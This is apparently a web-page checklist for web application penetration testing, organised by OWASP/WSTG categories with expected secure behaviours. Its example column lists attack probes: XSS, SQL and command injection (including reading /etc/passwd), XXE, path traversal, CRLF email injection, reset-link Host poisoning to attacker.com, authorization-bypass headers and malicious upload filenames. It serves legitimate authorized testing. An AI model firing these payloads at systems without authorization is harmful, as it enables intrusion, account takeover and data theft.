Created by Parikshit Rajput


Web App VAPT Checklist

Execution-Oriented OWASP / WSTG Checklist for Pentesters and Bug Bounty Hunters

21 OWASP / WSTG categories 53 sections 313 actionable checks Progress saved locally in browser
0 / 313 done

Information Gathering

38 checks
Search Engine Discovery & Information Leakage3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Use search engines to look for sensitive indexed content under the target domain. site:example.com filetype:env OR filetype:log OR filetype:bak OR filetype:sql
site:example.com inurl:admin OR inurl:staging		 No sensitive files, admin/UAT URLs, credentials, backups, or internal documents should be indexed.
Check Wayback/cached pages for old endpoints, parameters, backup files, and removed sensitive content. Wayback Machine, Google cache, Bing cache Removed or old sensitive content should not be publicly accessible or useful for attacks.
Search GitHub/GitLab/public docs for organization name, domain, API keys, internal URLs, credentials, or environment files. "example.com" "api_key"
"example.com" "password"
GitHub search: org/domain/secrets		 No secrets, tokens, internal configs, or private source code should be exposed publicly.
Fingerprint Web Server3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Capture responses and check headers/banner/version from web server or proxy. Server: Apache/2.4, nginx, IIS
Tools: Burp, curl -I, Nmap, WhatWeb		 Server should expose minimal version details; outdated versions should not be used.
Review HTTP headers for technology disclosure. X-Powered-By, X-AspNet-Version, X-Generator, Via Headers should not reveal unnecessary technology, framework, or version details.
Use safe fingerprinting to identify OS/service details only within scope. nmap -sV -Pn target Unnecessary OS/service details should not be disclosed publicly.
Review Webserver Metafiles3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Open /robots.txt and note disallowed paths, admin paths, private endpoints, or test directories. https://example.com/robots.txt robots.txt should not disclose sensitive or unauthenticated restricted paths.
Open /sitemap.xml and check for hidden, old, staging, or sensitive pages. https://example.com/sitemap.xml Sitemap should only expose intended public pages.
Check /.well-known/security.txt and other .well-known files for useful security/contact metadata or hidden configuration. /.well-known/security.txt
/.well-known/openid-configuration		 Only intended public metadata should be exposed.
Enumerate Applications on Webserver6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Use subdomain tools and search to discover all subdomains, then verify which are live and what they expose. subfinder -d example.com
amass enum -d example.com
crt.sh, assetfinder, site:*.example.com		 Only intended subdomains should be live; no exposed internal, test, or abandoned apps.
Fuzz the Host header against the target IP/domain to find hidden apps hosted on the same server. ffuf -w subs.txt -u https://example.com/ -H "Host: FUZZ.example.com"
gobuster vhost -u https://example.com -w subs.txt		 Hidden vhosts should not expose admin/internal/staging apps without proper controls.
Perform directory/path enumeration for unlinked apps and old panels. /admin, /dashboard, /portal, /backend, /old, /v1, /v2, /beta, /internal
Tools: dirsearch, ffuf, gobuster		 Hidden apps should not expose sensitive functionality, debug data, or unauthenticated access.
Search common admin paths and verify whether they are protected with auth, MFA, rate limit, and access control. /admin, /admin/login, /administrator, /manage, /panel, /cms, /wp-admin, /phpmyadmin Admin interfaces should require strong authentication and should not expose default credentials or bypasses.
Capture API traffic and check common API documentation/version paths. /api, /api/v1, /api/v2, /rest, /graphql, /swagger, /swagger-ui, /openapi.json, /api-docs APIs should require proper authentication/authorization and should not expose unnecessary docs in production.
Search for non-production environments and verify whether they expose weaker controls or real data. dev.example.com, test.example.com, uat.example.com, staging.example.com, preprod.example.com, qa.example.com, beta.example.com Non-production environments should not be publicly exposed or contain real data/weak credentials.
Review Comments & Metadata6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Open page source and Burp responses to find comments exposing internal notes, hidden paths, credentials, test data, or disabled functionality. <!-- TODO: remove /admin-test --> HTML comments should not expose sensitive implementation details.
Review JS files for TODO/FIXME notes, API endpoints, feature flags, environment names, or internal logic. app.js, main.js, chunk files JS comments should not reveal sensitive routes, keys, or business logic.
Send invalid/malformed requests and inspect responses/JS/API errors for stack traces, file paths, DB errors, or debug logs. Malformed JSON, invalid token, missing parameter Debug details should not be visible to users.
Search JS/config/API responses for API keys, tokens, secrets, client IDs, environment variables, or third-party credentials. apiKey, token, secret, client_id, Bearer, AWS_ACCESS_KEY No hardcoded secrets should be present in frontend/public files.
Download public PDFs/DOCX/XLSX/images and inspect metadata for author names, internal usernames, software versions, or file paths. exiftool file.pdf
exiftool image.jpg		 Metadata should not expose sensitive internal information.
Look for exposed .map files and verify whether they reveal original source code, hidden routes, comments, or sensitive logic. main.js.map, app.js.map, bundle.js.map Production source maps should not expose sensitive code or secrets.
Identify Application Entry Points3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
List every place where the user can submit or control data. Login, registration, search, upload, comments, profile, filters, headers, cookies All inputs should be known before injection/business logic testing.
Record endpoint path, method, parameters, headers, content type, auth requirement, and role requirement for each API. GET /api/user/{id}
POST /api/upload
PUT /api/profile		 All APIs should be documented for later authz/input/rate-limit tests.
List actions that change state or expose sensitive data. Password reset, email change, payment, coupon, delete, export, admin actions Sensitive actions should require proper auth, authorization, CSRF/anti-replay where applicable.
Map Execution Paths3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Capture full step sequence for key flows and note required preconditions for each step. Signup → OTP → Login
Forgot Password → Token/OTP → Set Password
Upload → Preview → Submit		 Backend should enforce each workflow step, not only frontend UI.
Record request order and dependencies for important flows. initiate-payment → verify-payment → confirm-order Later-step APIs should fail if earlier steps were skipped.
Try calling later APIs directly without completing previous steps. Call /reset-password without OTP/token verification Server should block workflow skipping.
Fingerprint Web Application5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Login with each available role and compare visible pages, buttons, APIs, and actions. Guest/user/premium/moderator/admin/super admin Low-privilege users should not access high-privilege actions or APIs.
Document business workflows step-by-step so they can be tested for skip/replay/repeat/tamper abuse. Coupon, payment, approval, upload, reset, registration Business rules should be enforced server-side.
Group APIs by functionality and record path, method, auth, parameters, and response. Auth APIs, User APIs, Admin APIs, Upload APIs API structure should not expose unintended sensitive endpoints.
Send invalid, missing, expired, malformed, and unauthorized requests to observe error style and leakage. Invalid user_id, expired token, malformed JSON, no auth header Errors should be generic and should not leak stack traces, DB errors, or user existence.
Record all protections in use: CAPTCHA, MFA, OTP, CSRF, rate limits, JWT/session validation, secure cookies, CORS, WAF/CDN, and re-authentication. Check login, forms, APIs, uploads, sensitive actions Security controls should be consistently applied across web, API, and alternate channels.
Map Application Architecture6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Observe how frontend calls backend APIs, including base URL, request format, auth method, and common headers. Frontend: app.example.com
Backend: api.example.com/v1
Auth: Bearer JWT		 Architecture and data flow should be understood for later access control and token tests.
Check whether APIs pass through a gateway/proxy by observing common domains, routing behavior, headers, rate limits, and error patterns. Via, X-Gateway, X-Request-ID, X-Amzn-Trace-Id, X-Envoy-Upstream-Service-Time, CF-Ray Gateway should enforce security consistently across APIs.
Determine whether auth uses JWT, session cookies, OAuth/SSO, API keys, OTP, or MFA, and where tokens are stored. Cookie, Authorization header, localStorage, sessionStorage, URL, response body Tokens should be stored/transmitted securely and validated server-side.
Group APIs by backend service/functionality and compare security behavior across services. auth, user, upload, payment, notification, admin services Each service should enforce auth, authorization, rate limits, and safe errors consistently.
List external services loaded or called by the app and check whether sensitive data/tokens/callbacks are exposed. Payment gateway, OAuth, SMS/email, analytics, CAPTCHA, CDN, chat, webhook provider Third-party integrations should not leak tokens, PII, or callback secrets.
Check DNS/headers/cache behavior to identify CDN, WAF, reverse proxy, or load balancer. CF-Ray, Server: cloudflare, Akamai, X-Cache, Age, Via, X-Forwarded-For Proxy/CDN behavior should not introduce cache, origin exposure, WAF bypass, or host-header issues.

Configuration & Deployment Management Testing

33 checks
Test Network / Infrastructure Configuration7 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Scan target host/IP and verify only required ports are publicly exposed. nmap -sV -Pn example.com Only approved ports like 80/443 should be public unless explicitly required.
Identify services behind open ports and check if risky services are publicly exposed. FTP, Telnet, SSH, RDP, MongoDB, Redis, MySQL, Elasticsearch Internal/admin services should not be exposed publicly.
Verify firewall/security group restrictions for admin/internal services. Attempt access from external network Unauthorized public access should be blocked.
Inspect responses, headers, JS, APIs, and errors for private IPs/hostnames/server names. 10.x.x.x, 172.16.x.x, 192.168.x.x, internal.local Internal network details should not leak.
Find cloud storage URLs/buckets referenced by app and verify read/write/list permissions. S3/GCS/Azure URLs, bucket listing Buckets should not be public unless intended; no sensitive files should be exposed.
Check caching behavior, origin exposure, and whether private pages are cached. X-Cache, Age, CF-Cache-Status, direct origin IP CDN should not cache sensitive user-specific content or expose origin.
Test TLS protocols, certificate validity, and weak ciphers. SSL Labs, testssl.sh, nmap ssl-enum-ciphers Only strong TLS configuration should be enabled.
Test Application Platform Configuration5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Look for debug mode, test mode, dev banners, debug endpoints, or verbose logs in app/API. debug=true, /debug, /actuator, stack traces Debug mode should be disabled in public environments.
Trigger invalid requests and verify errors do not expose stack traces, DB errors, internal paths, or framework details. Malformed JSON, invalid token, invalid object ID Errors should be generic and safe.
Look for default pages, install/setup pages, default credentials, sample apps, or exposed management consoles. /setup, /install, /server-status, default admin pages Default/sample/admin setup interfaces should not be accessible.
Identify server/framework/CMS/library versions and compare with known vulnerable versions. Wappalyzer, WhatWeb, Burp, Nuclei templates Known vulnerable components should not be exposed.
Review security headers and cookie flags. CSP, X-Frame-Options/frame-ancestors, X-Content-Type-Options, HSTS, Referrer-Policy, Secure/HttpOnly/SameSite Security headers and cookie flags should be properly configured.
Test File Extension Handling3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Directly request sensitive file extensions and common config/backup names. .env, .bak, .backup, .old, .log, .conf, .config, .json, .xml, .sql, .zip Sensitive files should not be publicly accessible.
Request/upload files and verify the server does not rely only on extension or declared Content-Type. Content-Type: image/jpeg for HTML/JS/SVG content Server should validate actual content and return safe MIME type.
Open uploaded/static risky files and check whether they execute/render inline. .html, .js, .svg, .php, .jsp, .aspx Risky files should not execute; dangerous content should be blocked or forced download.
Backup & Unreferenced Files4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Bruteforce common backup names and extensions. backup.zip, db.sql, site-old.zip, index.php.bak, config.old Backup files should not be accessible.
Look for temporary/editor-generated files. .tmp, .swp, .save, ~, .orig Temporary files should not expose source/configuration.
Check old/deprecated directories or API versions. /old, /backup, /legacy, /archive, /v1, /beta Old versions should not be exposed or weaker than current app.
Perform path enumeration for unlinked functionality. ffuf/dirsearch/gobuster with wordlists Hidden endpoints should not expose sensitive data or unauthenticated functionality.
Enumerate Admin Interfaces3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Check common admin/management URLs. /admin, /admin/login, /panel, /dashboard, /manage, /administrator, /backend, /console, /cms Admin panels should require strong authentication and access control.
Check admin API paths and test as unauthenticated/low-privilege user. /api/admin, /admin/api, /api/v1/admin, /management Admin APIs should return 401/403 unless authorized.
Verify MFA, rate limit, session timeout, secure cookies, no default credentials. Try default creds only in authorized scope Admin interfaces should have stronger protections than normal user areas.
Test HTTP Methods4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Send OPTIONS and manual requests to identify allowed methods. OPTIONS /path
Methods: GET, POST, PUT, PATCH, DELETE, TRACE		 Only required methods should be enabled.
Test if PUT/DELETE/TRACE allow upload, modification, deletion, or trace reflection. PUT /test.txt
DELETE /resource/1
TRACE /		 Dangerous methods should be disabled unless required and protected.
Send same request with method override headers/params to see if backend treats it as a different method. X-HTTP-Method-Override: DELETE
X-Method-Override: PUT
_method=DELETE		 Method override should be disabled or protected consistently.
Send the same restricted endpoint with GET/POST/PUT/PATCH/DELETE and verify authz is enforced for each. GET /api/admin/users → 403
POST /api/admin/users → should also be 403		 No method should bypass authentication, authorization, validation, or CSRF.
Test HTTP Strict Transport Security4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Verify Strict-Transport-Security exists on HTTPS responses. Strict-Transport-Security: max-age=31536000; includeSubDomains; preload HSTS should be present for HTTPS apps.
Verify max-age is strong and not too short. Recommended long max-age such as 31536000 HSTS should not use very short duration in production.
Verify includeSubDomains only if all subdomains support HTTPS. includeSubDomains No subdomain should break or expose HTTP-only sensitive flows.
Access HTTP URL and verify secure redirect without leaking cookies/tokens. http://example.com/login HTTP should redirect to HTTPS before sensitive data is sent.
Test RIA Cross Domain Policy3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Open root/application paths for Flash policy file. /crossdomain.xml Should be absent or restrictive if not required.
Open root/application paths for Silverlight policy file. /clientaccesspolicy.xml Should be absent or restrictive if not required.
Review policy files for wildcard domains or unrestricted headers. <allow-access-from domain="*" /> Only trusted domains should be allowed.

Identity Management Testing

9 checks
Role, Registration and Account Lifecycle9 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Create/use each role and compare allowed pages, APIs, menu items, actions, and data access. guest/user/admin/superadmin Roles should have clear boundaries and no privilege leakage.
Register with email/phone and try using account without completing verification. Skip OTP/email link; call login/profile APIs directly Unverified accounts should not access restricted functionality.
Register with same email/phone using case changes, spaces, plus addressing, Unicode, or alternate formats. Test@Mail.com vs test@mail.com
test+1@mail.com		 Duplicate or confusing accounts should be prevented according to policy.
Add hidden fields in registration body. {"email":"a@b.com","role":"admin","isVerified":true} Server should ignore/reject unauthorized fields.
Check newly created accounts for default roles, feature access, and API permissions. New user accessing /api/admin New accounts should receive least privilege only.
Compare valid/invalid usernames across login/signup/forgot password. valid@example.com vs invalid@example.com Response message/status/timing should not reveal account existence.
Try reserved/system usernames and confusing formats. admin, root, support, null, user..name, spaces Reserved or unsafe usernames should be blocked/normalized.
Use guest/demo/training accounts and check restricted pages/APIs/data. guest:guest, demo accounts Guest accounts should have minimal permissions and no sensitive data access.
Suspend/disable an account and try login/API/session reuse; then test reactivation flow. Use old session after suspension Suspended users should lose access immediately; reactivation should be secure.

Authentication Testing

56 checks
Login and Authentication Controls10 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Submit login and verify credentials/tokens never travel over HTTP or URL query string. Inspect Burp request/response Credentials must be sent only over HTTPS in request body, not URLs/loggable locations.
Try approved/common default credentials on login/admin/dev panels. admin/admin, admin/password, test/test Default credentials should not work.
Send repeated login attempts for same and different users/IPs. Burp Intruder/null payload; username rotation System should throttle, lock, CAPTCHA, or alert after excessive attempts.
Access authenticated pages/APIs without token/cookie or with modified/expired token. Remove Authorization header; use expired JWT; call /api/me directly Server should reject unauthenticated requests.
Search old login paths and verify they do not bypass current MFA/CAPTCHA/lockout/security controls. /login, /signin, /auth/login, /api/v1/login, /old-login, /mobile/login Legacy endpoints should be disabled or enforce same security controls.
Enable remember-me and inspect token/cookie lifetime, storage, rotation, and invalidation after logout/password reset. RememberMe cookie/localStorage token Persistent tokens should be secure, random, scoped, and invalidated when required.
Login, view sensitive page, logout, then use browser back/cache/offline mode. Back button after logout Sensitive pages should not be accessible from cache.
Try weak/common/passwords based on username/email. 123456, password, admin123, username@123 Weak/common passwords should be rejected.
Try guessable answers, repeated guesses, and public-info answers. mother maiden name, city, pet name Security answers should not be easily guessable/bruteforceable; rate limit should apply.
Compare web, mobile, API, old endpoints, and SSO flows for inconsistent authentication controls. Mobile API login without CAPTCHA/MFA while web has it All channels should enforce equivalent authentication security.
2FA / MFA / OTP Bypass Techniques12 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Intercept 2FA verification response and check whether client-side changes can unlock account. Change {"success":false} to {"success":true}; change 4xx to 200 in response Access must depend on server-side state, not client-side response manipulation.
Trigger 2FA/OTP and inspect response, logs, JS, and API body for OTP/code exposure. Look for otp, code, verificationCode in response OTP/2FA codes must never be returned to client.
Use a valid 2FA code once, then submit it again or from another session/device. Replay same OTP 2FA code should be single-use and bound to the correct user/session.
Attempt many wrong OTP values and observe retry limits, cooldown, lockout, and alerting. 000000, 111111, 123456; Burp Intruder OTP attempts should be strictly limited.
Try using OTP generated for User A/session A to verify User B/session B. Swap email/user_id/session/token in verify request OTP must be bound to intended account and session.
Try disabling 2FA without CSRF token and without password/re-auth confirmation. POST /2fa/disable without CSRF Disabling 2FA should require CSRF protection and re-authentication.
Enable 2FA, reset password, then check whether login/dashboard is accessible without completing 2FA. Password reset → login/dashboard Password reset should not silently disable or bypass MFA.
Use recovery/backup codes repeatedly, brute force them, or use codes from another session/user. Backup code reuse/bruteforce Backup codes should be single-use, random, rate-limited, and user-bound.
Check whether 2FA disable/manage page can be framed and abused via UI redress. Iframe PoC for /2fa/disable Sensitive 2FA pages should not be frameable.
Submit empty/null/default/common OTP values. null, "", 000000, 123456 Invalid/default OTP values should fail.
After password login but before 2FA, open other tabs/API endpoints and check access. /dashboard, /api/me, /api/admin after first factor only No protected endpoint should be accessible before MFA completion.
Repeat/modify registration OTP requests and final submit requests to see if verification state can be bypassed. Change phone/email in repeater after request creation Registration should only complete after valid OTP for the same account/session.
Forgot Password - Request Phase11 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Submit valid and invalid email/phone and compare message, status code, response length, redirect, and timing. valid@site.com vs invalid@site.com Response should be generic, e.g., "If account exists, reset instructions were sent."
Send many forgot-password requests for same account/IP and observe throttling/CAPTCHA/email flood protection. Burp Intruder null payload System should throttle, block, CAPTCHA, or alert excessive requests.
Request reset links/OTPs repeatedly and check if target receives unlimited messages. 20-50 reset requests in authorized test User should not receive unlimited reset messages.
Submit duplicate or multiple email values and verify reset link is not sent to attacker address. email=victim@mail.com&email=attacker@mail.com
{"email":["victim@mail.com","attacker@mail.com"]}		 Only the intended validated account owner should receive reset instructions.
Add separators to email field and check if application sends to multiple recipients or mis-parses value. victim@mail.com,attacker@mail.com
victim@mail.com attacker@mail.com
victim@mail.com|attacker@mail.com
victim@mail.com%00attacker@mail.com		 Email parser should reject invalid/multiple recipient values.
Inject CRLF into email-related fields to add CC/BCC/Subject/body headers. victim@mail.com%0aBCC:attacker@mail.com
victim@mail.com%0d%0aCC:attacker@mail.com		 CRLF/header injection must be blocked.
Submit incomplete email values and check if logic maps them to real accounts or bypasses validation. email=victim
email=victim@mail		 Invalid email formats should be rejected.
Request forgot password and inspect API response for reset token/link/OTP/user ID. {"resetPasswordLink":"https://...token=..."} Reset tokens/OTPs should not be returned in API responses.
Modify Host/X-Forwarded-Host during reset request and inspect reset email link domain. Host: attacker.com
X-Forwarded-Host: attacker.com
Host: target.com + X-Forwarded-Host: attacker.com		 Reset links must use trusted configured domain only.
Enter HTML/XSS-style email/name values and check whether reflected on page/email without encoding. "<svg/onload=alert(1)>"@gmail.com
<a href="https://attacker.com">Login</a>		 Input should be encoded/sanitized and not execute/render malicious HTML.
Submit malformed JSON, long strings, Unicode, invalid content type, or missing fields. Missing email; very long email; Content-Type conversion Application should return safe validation errors without stack traces.
Password Reset - Token/OTP/Password Phase23 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Generate a reset link/token and use it after its configured expiry window. Use old token after expiry Expired reset tokens should be rejected.
Use reset link once to change password, then use the same link again. Reuse same token/link Token should be invalidated after first successful use.
Request reset link A, then request reset link B, use B, then try A. Token A requested first; Token B requested later Older reset tokens should be invalidated when a new token is issued or after password change.
Request reset token, then log in and change password from account settings, then try old reset token. Forgot token → account setting password change → use old token Reset token should be invalidated after any password change.
Request reset token, change account email, then try old reset token. Forgot token → email change → use old token Reset token should be invalidated after email/account identifier change.
Modify token, user_id, email, phone, or account_id in reset request. {"token":"abc","user_id":"victim_id"} Token must be cryptographically random and bound to exact account.
Generate multiple reset tokens and compare for timestamp/user ID/email/name-based patterns. reset_1001, timestamp-like token, sequential token Tokens should be random, high entropy, and unpredictable.
Open reset page, click external/social links, and inspect outbound Referer header. Referer: https://site/reset-password/<token> Referrer-Policy should prevent token leakage; token should not be in URL when possible.
Try many invalid OTP codes and observe limits/lockout/cooldown. 000000, 111111, 123456; Burp Intruder OTP attempts should be limited and monitored.
Use OTP after expiry time. Wait until OTP expires Expired OTP should be rejected.
Use valid OTP once, then try it again. Replay same OTP OTP should be single-use.
Use OTP sent to User A/session A with User B/session B by changing email/phone/user_id in request. Change email=victim to attacker or vice versa OTP must be bound to correct account and session.
Call reset-password API without valid OTP/token or after deleting verification step parameters. POST /reset-password with only newPassword Server must validate token/OTP every time.
Capture successful reset request and resend it. Burp Repeater replay Replay should fail because token/OTP is consumed.
Send multiple parallel reset requests using the same valid token/OTP. Turbo Intruder / Burp parallel group Only one request should succeed.
Set weak/common/passwords similar to username/email. 123456, password, qwerty123, admin123 Weak/common passwords should be rejected.
Try resetting to current or previous passwords. newPassword = oldPassword Password history policy should block reuse if required.
Send different new password and confirm password values or tamper only one in API. newPassword=A, confirmPassword=B Password reset should fail.
Modify redirect/returnUrl/next parameter after successful reset. ?redirect=https://evil.com
?returnUrl=//evil.com		 External redirects should be blocked or allowlisted.
Submit reset/change-password request without CSRF token when cookie-based auth is used. Remove CSRF token/header State-changing password actions should require valid CSRF protection.
Reset password while active sessions exist in another browser/device, then test old sessions. Use old session after reset Old sessions should be invalidated or require re-authentication.
After reset/logout, use browser back button and cache/offline mode. Back to reset page/profile Sensitive reset pages should not be cached.
Inspect reset confirmation email/SMS/notification content. Password/token in notification Notification should not include password, token, or sensitive data.

Authorization Testing

13 checks
Directory Traversal / File Include / Null Byte4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Modify file/path parameters to access parent directories or restricted files. ../../etc/passwd
..\..\windows\win.ini		 Application should block traversal and only serve authorized files.
Try URL-encoded and double-encoded traversal. ..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd		 Encoded traversal should be normalized and blocked.
Inject null byte in filename/path to bypass extension checks in vulnerable stacks. config.php%00.pdf
image.php%00.jpg		 Null byte must not truncate validation or allow restricted file access.
If file/template/page parameters exist, try including local or remote resources in authorized scope. ?page=../../etc/passwd
?template=http://attacker.test/a		 Application should allowlist files and block remote inclusion.
Authorization Bypass and 403 Bypass5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Access restricted pages/APIs without login and as low-privilege user. /admin, /api/admin/users Should return 401/403 and no sensitive data.
Try variations of restricted path with slashes, dots, semicolons, and encoded characters. /admin%09
/admin%20
/admin/.
//admin//
/./admin/./
/..;/admin
/admin..;/		 Access control should apply after canonical path normalization.
Try single/double encoded path traversal or dot encodings against restricted resources. /%2e/admin
/%252e/admin		 Encoded paths should not bypass access control.
Add rewrite/original URL/IP override headers and check if backend routes to restricted resource. X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1		 Client-controlled headers should not bypass access control.
Send restricted endpoint with different HTTP methods. GET/POST/PUT/PATCH/DELETE /admin/resource Authorization should be enforced for every method.
Privilege Escalation and IDOR4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Change object/user IDs to access another user’s resources. /api/orders/1001 → /api/orders/1002 Users should access only their own authorized objects.
As normal user, modify role/permission/status fields or call admin APIs. {"role":"admin","isAdmin":true} Server should reject unauthorized role/permission changes.
Modify IDs in GET/PUT/DELETE/download requests and verify object-level authorization. user_id, file_id, order_id, invoice_id, message_id Every object access should be authorized server-side.
Enumerate sequential IDs and check whether data is exposed. 1,2,3...; UUID swaps Predictable IDs should still be protected by authorization.

Session Management Testing

8 checks

Data Validation Testing

16 checks
Injection and Input Validation16 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Inject script/HTML payloads in parameters/forms/headers and check immediate reflection/execution. <script>alert(1)</script>
"><svg/onload=alert(1)>		 Input should be encoded/sanitized; no script execution.
Store payloads in profile/comments/posts/uploads and view as another user. <img src=x onerror=alert(1)> Stored user content should not execute scripts.
Change request methods and verify validation/authz remains same. GET ↔ POST ↔ PUT ↔ DELETE Method changes should not bypass controls.
Send duplicate/conflicting parameters in query/body/JSON/multipart. id=1&id=2
role=user&role=admin
{"email":["victim","attacker"]}		 Backend should handle duplicates safely and consistently.
Inject SQL metacharacters/operators in inputs and observe errors/timing/logic changes. ' OR '1'='1
' AND SLEEP(5)--		 Parameterized queries should prevent SQL injection.
Inject LDAP filter characters in auth/search inputs. *)(uid=*))(|(uid=*
admin*)		 LDAP queries should be safely encoded.
Tamper filters/sort/search JSON used by ORM queries. {"where":{"role":{"$ne":"user"}}} ORM filters should be allowlisted and server-controlled.
Submit XML with entities/doctype if XML is accepted. <!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> External entities should be disabled; XML should be safely parsed.
Inject SSI directives where server-side includes may process content. <!--#exec cmd="id"--> SSI directives should not execute from user input.
Inject XPath logic in XML-backed search/auth inputs. ' or '1'='1 XPath queries should be parameterized/escaped.
Inject CRLF or mail command payloads in email-related fields. test@test.com%0aBCC:attacker@test.com Mail commands/headers should not be injectable.
Inject language/template expressions where dynamic evaluation may occur. ${7*7}
{{7*7}}
<%= 7*7 %>		 User input should not be evaluated as code.
Inject OS command separators in parameters used by server commands. ; id
&& whoami
| cat /etc/passwd
`id`		 OS commands should not be built from raw user input.
Send oversized input values and malformed data to check crashes/errors. Very long strings, large JSON arrays, large multipart values Application should validate size and handle errors safely.
Store payloads in one feature and trigger them later in another workflow. Stored XSS in profile rendered in admin panel/email/pdf Stored content should remain safe wherever reused.
Test CRLF header injection and safe request smuggling detection in authorized environments. %0d%0aSet-Cookie: injected=1
CL.TE/TE.CL probes with Burp Smuggler		 No header injection or frontend/backend request desync should occur.

Error Handling Testing

2 checks
Error Codes and Stack Traces2 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Trigger invalid, unauthorized, forbidden, malformed, and server-error scenarios and compare responses. 400/401/403/404/500 paths Errors should use correct status codes and not reveal sensitive data or enumeration clues.
Force exceptions using malformed inputs and check for stack traces/framework/DB/internal path leakage. Malformed JSON, invalid IDs, invalid file type Stack traces and internal implementation details should not be visible.

Cryptography Testing

3 checks
Transport and Crypto Controls3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Scan TLS versions, ciphers, certificate chain, hostname, expiry, and weak protocols. SSL Labs, testssl.sh, nmap --script ssl-enum-ciphers Only strong TLS/ciphers and valid certificates should be used.
For encrypted tokens/parameters, alter ciphertext and observe error/timing differences. Modify encrypted cookie/token blocks Crypto errors should be generic; vulnerable CBC oracle behavior should not exist.
Check whether credentials, tokens, OTPs, or PII are sent over HTTP or loggable URLs. http://, query params, Referer, logs Sensitive data should be encrypted in transit and not placed in URLs.

Business Logic Testing

26 checks
Core Business Logic7 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Submit invalid business values such as negative amount, excessive quantity, invalid state, or unauthorized status. amount=-1, quantity=999999, status=approved Server should enforce valid business rules.
Modify hidden/client-controlled fields in requests and replay actions. price=1, role=admin, isPaid=true, status=approved Server should ignore/recalculate sensitive values.
Remove/tamper checksum/signature/hidden fields and check if request is accepted. Remove signature; modify signed field Integrity-protected values should fail if tampered.
Send parallel requests for one-time/limited actions. Apply coupon 20 times; withdraw twice; submit same OTP/token in parallel Critical operations should be atomic; only one should succeed.
Repeat limited functions rapidly and across sessions/IPs. OTP resend, coupon use, download, invite, reward, login, API quota Usage limits and rate limits should be enforced server-side.
Call later-step APIs directly without completing earlier steps. payment-confirm without payment-initiate; reset-password without OTP verification Backend should block skipped or out-of-order workflows.
Automate spam/mass actions/scraping/fake registration/excessive requests. Mass comments, mass follows, scraping API pages Abuse controls should throttle, block, or detect misuse.
File Upload Functionality (WSTG-BUSL-08 / WSTG-BUSL-09)19 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Upload disallowed file types. .php, .jsp, .aspx, .exe, .sh, .html, .js Only approved file types should be accepted.
Try double/mixed extensions and case variations. shell.php.jpg, test.jpg.php, file.PHP, file.phP5 Validation should not rely only on final extension.
Change Content-Type to allowed value while body contains disallowed content. Content-Type: image/jpeg for HTML/PHP/JS content Server should validate actual file content.
Add valid image magic bytes to malicious/non-image content. GIF89a + script/PHP content Server should verify full content safely, not only magic bytes.
Upload SVG containing script/event handlers/external references. <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg> SVG should be blocked, sanitized, or served safely.
Upload HTML file or file rendered as HTML and open it in browser. <script>alert(1)</script>.html Uploaded content should not execute script in trusted origin.
Upload safe malware test file in authorized environment. EICAR test file Malware scanning should block/quarantine unsafe files.
Upload very large files or many files quickly. Large multipart upload; repeated uploads Size/rate limits should prevent resource abuse.
Use special characters, CRLF, quotes, unicode, or script in filename. "><script>alert(1)</script>.jpg
file%0d%0aContent-Type:text/html.jpg		 Filename should be sanitized and safely displayed.
Upload filename with traversal sequences. ../../test.jsp
..\..\webroot\shell.jsp		 File should not escape upload directory or overwrite system files.
Attempt upload without login/token or with expired/invalid token. Remove Authorization header/cookie Upload should require proper authentication.
Try viewing/downloading/deleting another user’s uploaded file by changing file ID/path. /files/123 → /files/124 Object-level authorization should protect files.
Open uploaded file URL directly in browser/incognito and without auth. https://cdn.example.com/uploads/file.jpg Access should follow authorization rules.
Upload script-like file and check if it executes server-side or client-side. shell.php, shell.jsp, .phtml, .aspx Uploaded files should never execute as code.
Determine whether uploaded files are stored under web root/public bucket/CDN and whether listing is enabled. /uploads/, S3 bucket URL Files should be stored safely with controlled access and no listing.
Upload same filename multiple times or same path from different users. avatar.jpg repeated Files should not overwrite others unless intended and authorized.
